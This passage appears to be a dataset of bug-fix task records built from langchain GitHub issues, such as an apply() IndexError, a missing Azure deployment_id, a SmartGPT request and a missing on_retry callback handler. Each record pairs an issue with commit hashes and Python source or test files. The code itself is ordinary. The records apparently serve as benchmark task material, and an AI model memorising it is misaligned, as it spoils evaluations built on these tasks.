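inputs = [{"context": d.page_content} for d in docs]

chain.apply(inputs)  # IndexError: list index out of range
```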
https://github.com/langchain-ai/langchain/issues/1733
https://github.com/langchain-ai/langchain/pull/5769
c0acbdca1b5884ac90d17908fb2bb555a9ed9909
2184e3a4005f5c48126523cce92930fca6a31760
"2023-03-17T11:14:48Z"
python
"2023-08-11T05:50:39Z"
libs/langchain/langchain/chains/llm.py
"""Chain that just formats a prompt and calls an LLM.""" from __future__ import annotations import warnings from typing import Any, Dict, List, Optional, Sequence, Tuple, Union from pydantic import Extra, Field from langchain.callbacks.manager import ( AsyncCallbackManager, AsyncCallbackManagerForChainRun, CallbackManager, CallbackManagerForChainRun, Callbacks, ) from langchain.chains.base import Chain from langchain.load.dump import dumpd from langchain.prompts.prompt import PromptTemplate from langchain.schema import ( BaseLLMOutputParser, BasePromptTemplate, LLMResult, PromptValue, StrOutputParser, ) from langchain.schema.language_model import BaseLanguageModel from langchain.utils.input import get_colored_text class LLMChain(Chain): """Chain to run queries against LLMs. Example: .. code-block:: python from langchain import LLMChain, OpenAI, PromptTemplate prompt_template = "Tell me a {adjective} joke" prompt = PromptTemplate( input_variables=["adjective"], template=prompt_template ) llm = LLMChain(llm=OpenAI(), prompt=prompt) """ @property def lc_serializable(self) -> bool: return True prompt: BasePromptTemplate """Prompt object to use.""" llm: BaseLanguageModel """Language model to call.""" output_key: str = "text" #: :meta private: output_parser: BaseLLMOutputParser = Field(default_factory=StrOutputParser) """Output parser to use. Defaults to one that takes the most likely string but does not change it otherwise.""" return_final_only: bool = True """Whether to return only the final parsed result. Defaults to True. If false, will return a bunch of extra information about the generation.""" llm_kwargs: dict = Field(default_factory=dict) class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def input_keys(self) -> List[str]: """Will be whatever keys the prompt expects. :meta private: """ return self.prompt.input_variables @property def output_keys(self) -> List[str]: """Will always return text key. 
:meta private: """ if self.return_final_only: return [self.output_key] else: return [self.output_key, "full_generation"] def _call( self, inputs: Dict[str, Any], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, str]: response = self.generate([inputs], run_manager=run_manager) return self.create_outputs(response)[0] def generate( self, input_list: List[Dict[str, Any]], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> LLMResult: """Generate LLM result from inputs.""" prompts, stop = self.prep_prompts(input_list, run_manager=run_manager) return self.llm.generate_prompt( prompts, stop, callbacks=run_manager.get_child() if run_manager else None, **self.llm_kwargs, ) async def agenerate( self, input_list: List[Dict[str, Any]], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> LLMResult: """Generate LLM result from inputs.""" prompts, stop = await self.aprep_prompts(input_list, run_manager=run_manager) return await self.llm.agenerate_prompt( prompts, stop, callbacks=run_manager.get_child() if run_manager else None, **self.llm_kwargs, ) def prep_prompts( self, input_list: List[Dict[str, Any]], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Tuple[List[PromptValue], Optional[List[str]]]: """Prepare prompts from inputs.""" stop = None if "stop" in input_list[0]: stop = input_list[0]["stop"] prompts = [] for inputs in input_list: selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} prompt = self.prompt.format_prompt(**selected_inputs) _colored_text = get_colored_text(prompt.to_string(), "green") _text = "Prompt after formatting:\n" + _colored_text if run_manager: run_manager.on_text(_text, end="\n", verbose=self.verbose) if "stop" in inputs and inputs["stop"] != stop: raise ValueError( "If `stop` is present in any inputs, should be present in all." ) prompts.append(prompt) return prompts, stop async def aprep_prompts( self, input_list: List[Dict[str, Any]], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> Tuple[List[PromptValue], Optional[List[str]]]: """Prepare prompts from inputs.""" stop = None if "stop" in input_list[0]: stop = input_list[0]["stop"] prompts = [] for inputs in input_list: selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} prompt = self.prompt.format_prompt(**selected_inputs) _colored_text = get_colored_text(prompt.to_string(), "green") _text = "Prompt after formatting:\n" + _colored_text if run_manager: await run_manager.on_text(_text, end="\n", verbose=self.verbose) if "stop" in inputs and inputs["stop"] != stop: raise ValueError( "If `stop` is present in any inputs, should be present in all." 
) prompts.append(prompt) return prompts, stop def apply( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> List[Dict[str, str]]: """Utilize the LLM generate method for speed gains.""" callback_manager = CallbackManager.configure( callbacks, self.callbacks, self.verbose ) run_manager = callback_manager.on_chain_start( dumpd(self), {"input_list": input_list}, ) try: response = self.generate(input_list, run_manager=run_manager) except (KeyboardInterrupt, Exception) as e: run_manager.on_chain_error(e) raise e outputs = self.create_outputs(response) run_manager.on_chain_end({"outputs": outputs}) return outputs async def aapply( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> List[Dict[str, str]]: """Utilize the LLM generate method for speed gains.""" callback_manager = AsyncCallbackManager.configure( callbacks, self.callbacks, self.verbose ) run_manager = await callback_manager.on_chain_start( dumpd(self), {"input_list": input_list}, ) try: response = await self.agenerate(input_list, run_manager=run_manager) except (KeyboardInterrupt, Exception) as e: await run_manager.on_chain_error(e) raise e outputs = self.create_outputs(response) await run_manager.on_chain_end({"outputs": outputs}) return outputs @property def _run_output_key(self) -> str: return self.output_key def create_outputs(self, llm_result: LLMResult) -> List[Dict[str, Any]]: """Create outputs from response.""" result = [ # Get the text of the top generated string. { self.output_key: self.output_parser.parse_result(generation), "full_generation": generation, } for generation in llm_result.generations ] if self.return_final_only: result = [{self.output_key: r[self.output_key]} for r in result] return result async def _acall( self, inputs: Dict[str, Any], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> Dict[str, str]: response = await self.agenerate([inputs], run_manager=run_manager) return self.create_outputs(response)[0] def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str: """Format prompt with kwargs and pass to LLM. Args: callbacks: Callbacks to pass to LLMChain **kwargs: Keys to pass to prompt template. Returns: Completion from LLM. Example: .. code-block:: python completion = llm.predict(adjective="funny") """ return self(kwargs, callbacks=callbacks)[self.output_key] async def apredict(self, callbacks: Callbacks = None, **kwargs: Any) -> str: """Format prompt with kwargs and pass to LLM. Args: callbacks: Callbacks to pass to LLMChain **kwargs: Keys to pass to prompt template. Returns: Completion from LLM. Example: .. code-block:: python completion = llm.predict(adjective="funny") """ return (await self.acall(kwargs, callbacks=callbacks))[self.output_key] def predict_and_parse( self, callbacks: Callbacks = None, **kwargs: Any ) -> Union[str, List[str], Dict[str, Any]]: """Call predict and then parse the results.""" warnings.warn( "The predict_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = self.predict(callbacks=callbacks, **kwargs) if self.prompt.output_parser is not None: return self.prompt.output_parser.parse(result) else: return result async def apredict_and_parse( self, callbacks: Callbacks = None, **kwargs: Any ) -> Union[str, List[str], Dict[str, str]]: """Call apredict and then parse the results.""" warnings.warn( "The apredict_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." 
) result = await self.apredict(callbacks=callbacks, **kwargs) if self.prompt.output_parser is not None: return self.prompt.output_parser.parse(result) else: return result def apply_and_parse( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> Sequence[Union[str, List[str], Dict[str, str]]]: """Call apply and then parse the results.""" warnings.warn( "The apply_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = self.apply(input_list, callbacks=callbacks) return self._parse_generation(result) def _parse_generation( self, generation: List[Dict[str, str]] ) -> Sequence[Union[str, List[str], Dict[str, str]]]: if self.prompt.output_parser is not None: return [ self.prompt.output_parser.parse(res[self.output_key]) for res in generation ] else: return generation async def aapply_and_parse( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> Sequence[Union[str, List[str], Dict[str, str]]]: """Call apply and then parse the results.""" warnings.warn( "The aapply_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = await self.aapply(input_list, callbacks=callbacks) return self._parse_generation(result) @property def _chain_type(self) -> str: return "llm_chain" @classmethod def from_string(cls, llm: BaseLanguageModel, template: str) -> LLMChain: """Create LLMChain from LLM and template.""" prompt_template = PromptTemplate.from_template(template) return cls(llm=llm, prompt=prompt_template)
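For orientation, a brief usage sketch of the chain defined above; it assumes an OpenAI API key is configured, and the prompt and variable names are illustrative rather than taken from this record:

```python
# A minimal sketch of LLMChain usage, assuming OPENAI_API_KEY is set.
from langchain import LLMChain, OpenAI, PromptTemplate

prompt = PromptTemplate.from_template("Tell me a {adjective} joke")
chain = LLMChain(llm=OpenAI(), prompt=prompt)

print(chain.predict(adjective="funny"))  # single formatted call
print(chain.apply([{"adjective": "dry"}, {"adjective": "dark"}]))  # batched generate
```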
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
5,001
Azure OpenAI Embeddings failed due to no deployment_id set.
### System Info Broken by #4915 Error: `Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>` I'm putting a PR out to fix this now. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Run example notebook: https://github.com/hwchase17/langchain/blob/22d844dc0795e7e53a4cc499bf4974cb83df490d/docs/modules/models/text_embedding/examples/azureopenai.ipynb ### Expected behavior Embedding using Azure OpenAI should work.
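For reference, a minimal sketch of the intended Azure usage once the fix forwards the deployment parameter; the endpoint, key, and deployment names below are placeholders, not values from this issue:

```python
# A hedged sketch with placeholder Azure resource names.
import os

from langchain.embeddings import OpenAIEmbeddings

os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-resource>.openai.azure.com/"  # placeholder
os.environ["OPENAI_API_KEY"] = "<your-key>"  # placeholder
os.environ["OPENAI_API_VERSION"] = "2023-05-15"

# After the linked fix, `deployment` should be forwarded as the
# `engine`/`deployment_id` parameter that the error message says is missing.
embeddings = OpenAIEmbeddings(deployment="<your-embeddings-deployment>")  # placeholder
vector = embeddings.embed_query("hello world")
```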
https://github.com/langchain-ai/langchain/issues/5001
https://github.com/langchain-ai/langchain/pull/5002
45741bcc1b65e588e560b60e347ab391858d53f5
1d3735a84c64549d4ef338506ae0b68d53541b44
"2023-05-19T20:18:47Z"
python
"2023-08-11T22:43:01Z"
libs/langchain/tests/integration_tests/embeddings/test_openai.py
"""Test openai embeddings.""" import numpy as np import openai import pytest from langchain.embeddings.openai import OpenAIEmbeddings def test_openai_embedding_documents() -> None: """Test openai embeddings.""" documents = ["foo bar"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(documents) assert len(output) == 1 assert len(output[0]) == 1536 def test_openai_embedding_documents_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = embedding.embed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.asyncio async def test_openai_embedding_documents_async_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = await embedding.aembed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 def test_openai_embedding_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = embedding.embed_query(document) assert len(output) == 1536 @pytest.mark.asyncio async def test_openai_embedding_async_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = await embedding.aembed_query(document) assert len(output) == 1536 def test_openai_embedding_with_empty_string() -> None: """Test openai embeddings with empty string.""" document = ["", "abc"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(document) assert len(output) == 2 assert len(output[0]) == 1536 expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[ "data" ][0]["embedding"] assert np.allclose(output[0], expected_output) assert len(output[1]) == 1536 def test_embed_documents_normalized() -> None: output = OpenAIEmbeddings().embed_documents(["foo walked to the market"]) assert np.isclose(np.linalg.norm(output[0]), 1.0) def test_embed_query_normalized() -> None: output = OpenAIEmbeddings().embed_query("foo walked to the market") assert np.isclose(np.linalg.norm(output), 1.0)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Perhaps it is already implemented, but I didn't find it. This method looks simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
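For reference, a minimal sketch of the `SmartLLMChain` that the linked PR adds under `langchain_experimental`; the question text, temperature, and `n_ideas` value are illustrative:

```python
# A hedged sketch of the SmartGPT-style flow: generate n draft answers,
# critique them, then resolve a final answer.
from langchain.chat_models import ChatOpenAI
from langchain.prompts import PromptTemplate
from langchain_experimental.smart_llm import SmartLLMChain

prompt = PromptTemplate.from_template("{question}")
chain = SmartLLMChain(
    llm=ChatOpenAI(temperature=0.6),
    prompt=prompt,
    n_ideas=3,  # number of draft answers produced before critique/resolution
    verbose=True,
)
print(chain.run(question="I have a 12 liter jug and a 6 liter jug. How do I measure exactly 6 liters?"))
```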
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
docs/extras/use_cases/self_check/smart_llm.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Perhaps it is already implemented, but I didn't find it. This method looks simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
libs/experimental/langchain_experimental/smart_llm/__init__.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Perhaps it is already implemented, but I didn't find it. This method looks simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
libs/experimental/langchain_experimental/smart_llm/base.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Perhaps it is already implemented, but I didn't find it. This method looks simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
libs/experimental/tests/unit_tests/test_smartllm.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,542
Error: 'OpenAICallbackHandler' object has no attribute 'on_retry'`
### System Info **LangChain:** 0.0.248 **Python:** 3.10.10 **OS version:** Linux 5.10.178-162.673.amzn2.x86_64 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction **Code:**
```
try:
    with get_openai_callback() as cb:
        llm_chain = LLMChain(llm=llm, prompt=prompt_main)
        all_text = str(template) + str(prompt) + str(usescases) + str(transcript)
        threshold = llm.get_num_tokens(text=all_text) + 800
        dataframe_copy.loc[index, "Total Tokens"] = threshold
        if int(threshold) <= 4000:
            chatgpt_output = llm_chain.run({"prompt": prompt, "use_cases_dictionary": usescases, "transcript": transcript})
            chatgpt_output = text_post_processing(chatgpt_output)
            dataframe_copy.loc[index, "ChatGPT Output"] = chatgpt_output
            dataframe_copy.loc[index, "Cost (USD)"] = cb.total_cost
        else:
            dataframe_copy.loc[index, "ChatGPT Output"] = " "
            dataframe_copy.loc[index, "Cost (USD)"] = " "
except Exception as e:
    dataframe_copy.loc[index, "ChatGPT Output"] = " "
    dataframe_copy.loc[index, "Cost (USD)"] = " "
    continue
```
**Error Message:** `Retrying langchain.chat_models.openai.ChatOpenAI.completion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIError: Bad gateway. {"error":{"code":502,"message":"Bad gateway.","param":null,"type":"cf_bad_gateway"}} 502 {'error': {'code': 502, 'message': 'Bad gateway.', 'param': None, 'type': 'cf_bad_gateway'}} {'Date': 'Mon, 31 Jul 2023 20:24:53 GMT', 'Content-Type': 'application/json', 'Content-Length': '84', 'Connection': 'keep-alive', 'X-Frame-Options': 'SAMEORIGIN', 'Referrer-Policy': 'same-origin', 'Cache-Control': 'private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Expires': 'Thu, 01 Jan 1970 00:00:01 GMT', 'Server': 'cloudflare', 'CF-RAY': '7ef889a50eaca7f3-SYD', 'alt-svc': 'h3=":443"; ma=86400'}. Error in OpenAICallbackHandler.on_retry callback: 'OpenAICallbackHandler' object has no attribute 'on_retry'` ![bug](https://github.com/langchain-ai/langchain/assets/43797457/9b8025e0-f486-48bb-9d74-fdaa6cef4574) ### Expected behavior I went through the callback [documentation](https://api.python.langchain.com/en/latest/callbacks/langchain.callbacks.openai_info.OpenAICallbackHandler.html) and the "on_retry" method is indeed not listed there. So the core code for OpenAICallbackHandler likely needs to be updated, because something is calling "on_retry" on it.
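For reference, a minimal sketch (not the exact PR) of the missing hook: giving the base handler mixin a no-op `on_retry` default prevents the `AttributeError` when a retry event fires:

```python
# A hedged sketch; the real retry code path passes a tenacity.RetryCallState.
from typing import Any, Optional
from uuid import UUID


class RunManagerMixin:
    def on_retry(
        self,
        retry_state: Any,  # tenacity.RetryCallState in practice
        *,
        run_id: UUID,
        parent_run_id: Optional[UUID] = None,
        **kwargs: Any,
    ) -> Any:
        """Run on a retry event; the no-op default avoids AttributeError."""
```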
https://github.com/langchain-ai/langchain/issues/8542
https://github.com/langchain-ai/langchain/pull/9230
d0a0d560add6c5bc6ded60be506a87d98bf333c3
c478fc208ed4c29e979abeb7a532eb4d01431e1b
"2023-07-31T21:01:43Z"
python
"2023-08-14T23:45:17Z"
libs/langchain/langchain/callbacks/base.py
"""Base callback handler that can be used to handle callbacks in langchain.""" from __future__ import annotations from typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Union from uuid import UUID if TYPE_CHECKING: from langchain.schema.agent import AgentAction, AgentFinish from langchain.schema.document import Document from langchain.schema.messages import BaseMessage from langchain.schema.output import LLMResult class RetrieverManagerMixin: """Mixin for Retriever callbacks.""" def on_retriever_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when Retriever errors.""" def on_retriever_end( self, documents: Sequence[Document], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when Retriever ends running.""" class LLMManagerMixin: """Mixin for LLM callbacks.""" def on_llm_new_token( self, token: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on new LLM token. Only available when streaming is enabled.""" def on_llm_end( self, response: LLMResult, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when LLM ends running.""" def on_llm_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when LLM errors.""" class ChainManagerMixin: """Mixin for chain callbacks.""" def on_chain_end( self, outputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when chain ends running.""" def on_chain_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when chain errors.""" def on_agent_action( self, action: AgentAction, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on agent action.""" def on_agent_finish( self, finish: AgentFinish, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on agent end.""" class ToolManagerMixin: """Mixin for tool callbacks.""" def on_tool_end( self, output: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when tool ends running.""" def on_tool_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run when tool errors.""" class CallbackManagerMixin: """Mixin for callback manager.""" def on_llm_start( self, serialized: Dict[str, Any], prompts: List[str], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when LLM starts running.""" def on_chat_model_start( self, serialized: Dict[str, Any], messages: List[List[BaseMessage]], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when a chat model starts running.""" raise NotImplementedError( f"{self.__class__.__name__} does not implement `on_chat_model_start`" ) def on_retriever_start( self, serialized: Dict[str, Any], query: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when Retriever starts running.""" def on_chain_start( self, 
serialized: Dict[str, Any], inputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when chain starts running.""" def on_tool_start( self, serialized: Dict[str, Any], input_str: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when tool starts running.""" class RunManagerMixin: """Mixin for run manager.""" def on_text( self, text: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, **kwargs: Any, ) -> Any: """Run on arbitrary text.""" class BaseCallbackHandler( LLMManagerMixin, ChainManagerMixin, ToolManagerMixin, RetrieverManagerMixin, CallbackManagerMixin, RunManagerMixin, ): """Base callback handler that can be used to handle callbacks from langchain.""" raise_error: bool = False run_inline: bool = False @property def ignore_llm(self) -> bool: """Whether to ignore LLM callbacks.""" return False @property def ignore_retry(self) -> bool: """Whether to ignore retry callbacks.""" return False @property def ignore_chain(self) -> bool: """Whether to ignore chain callbacks.""" return False @property def ignore_agent(self) -> bool: """Whether to ignore agent callbacks.""" return False @property def ignore_retriever(self) -> bool: """Whether to ignore retriever callbacks.""" return False @property def ignore_chat_model(self) -> bool: """Whether to ignore chat model callbacks.""" return False class AsyncCallbackHandler(BaseCallbackHandler): """Async callback handler that can be used to handle callbacks from langchain.""" async def on_llm_start( self, serialized: Dict[str, Any], prompts: List[str], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run when LLM starts running.""" async def on_chat_model_start( self, serialized: Dict[str, Any], messages: List[List[BaseMessage]], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run when a chat model starts running.""" raise NotImplementedError( f"{self.__class__.__name__} does not implement `on_chat_model_start`" ) async def on_llm_new_token( self, token: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on new LLM token. 
Only available when streaming is enabled.""" async def on_llm_end( self, response: LLMResult, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when LLM ends running.""" async def on_llm_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when LLM errors.""" async def on_chain_start( self, serialized: Dict[str, Any], inputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run when chain starts running.""" async def on_chain_end( self, outputs: Dict[str, Any], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when chain ends running.""" async def on_chain_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when chain errors.""" async def on_tool_start( self, serialized: Dict[str, Any], input_str: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run when tool starts running.""" async def on_tool_end( self, output: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when tool ends running.""" async def on_tool_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run when tool errors.""" async def on_text( self, text: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on arbitrary text.""" async def on_agent_action( self, action: AgentAction, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on agent action.""" async def on_agent_finish( self, finish: AgentFinish, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on agent end.""" async def on_retriever_start( self, serialized: Dict[str, Any], query: str, *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> None: """Run on retriever start.""" async def on_retriever_end( self, documents: Sequence[Document], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on retriever end.""" async def on_retriever_error( self, error: Union[Exception, KeyboardInterrupt], *, run_id: UUID, parent_run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Run on retriever error.""" class BaseCallbackManager(CallbackManagerMixin): """Base callback manager that handles callbacks from LangChain.""" def __init__( self, handlers: List[BaseCallbackHandler], inheritable_handlers: Optional[List[BaseCallbackHandler]] = None, parent_run_id: Optional[UUID] = None, *, tags: Optional[List[str]] = None, inheritable_tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, inheritable_metadata: Optional[Dict[str, 
Any]] = None, ) -> None: """Initialize callback manager.""" self.handlers: List[BaseCallbackHandler] = handlers self.inheritable_handlers: List[BaseCallbackHandler] = ( inheritable_handlers or [] ) self.parent_run_id: Optional[UUID] = parent_run_id self.tags = tags or [] self.inheritable_tags = inheritable_tags or [] self.metadata = metadata or {} self.inheritable_metadata = inheritable_metadata or {} @property def is_async(self) -> bool: """Whether the callback manager is async.""" return False def add_handler(self, handler: BaseCallbackHandler, inherit: bool = True) -> None: """Add a handler to the callback manager.""" if handler not in self.handlers: self.handlers.append(handler) if inherit and handler not in self.inheritable_handlers: self.inheritable_handlers.append(handler) def remove_handler(self, handler: BaseCallbackHandler) -> None: """Remove a handler from the callback manager.""" self.handlers.remove(handler) self.inheritable_handlers.remove(handler) def set_handlers( self, handlers: List[BaseCallbackHandler], inherit: bool = True ) -> None: """Set handlers as the only handlers on the callback manager.""" self.handlers = [] self.inheritable_handlers = [] for handler in handlers: self.add_handler(handler, inherit=inherit) def set_handler(self, handler: BaseCallbackHandler, inherit: bool = True) -> None: """Set handler as the only handler on the callback manager.""" self.set_handlers([handler], inherit=inherit) def add_tags(self, tags: List[str], inherit: bool = True) -> None: for tag in tags: if tag in self.tags: self.remove_tags([tag]) self.tags.extend(tags) if inherit: self.inheritable_tags.extend(tags) def remove_tags(self, tags: List[str]) -> None: for tag in tags: self.tags.remove(tag) self.inheritable_tags.remove(tag) def add_metadata(self, metadata: Dict[str, Any], inherit: bool = True) -> None: self.metadata.update(metadata) if inherit: self.inheritable_metadata.update(metadata) def remove_metadata(self, keys: List[str]) -> None: for key in keys: self.metadata.pop(key) self.inheritable_metadata.pop(key) Callbacks = Optional[Union[List[BaseCallbackHandler], 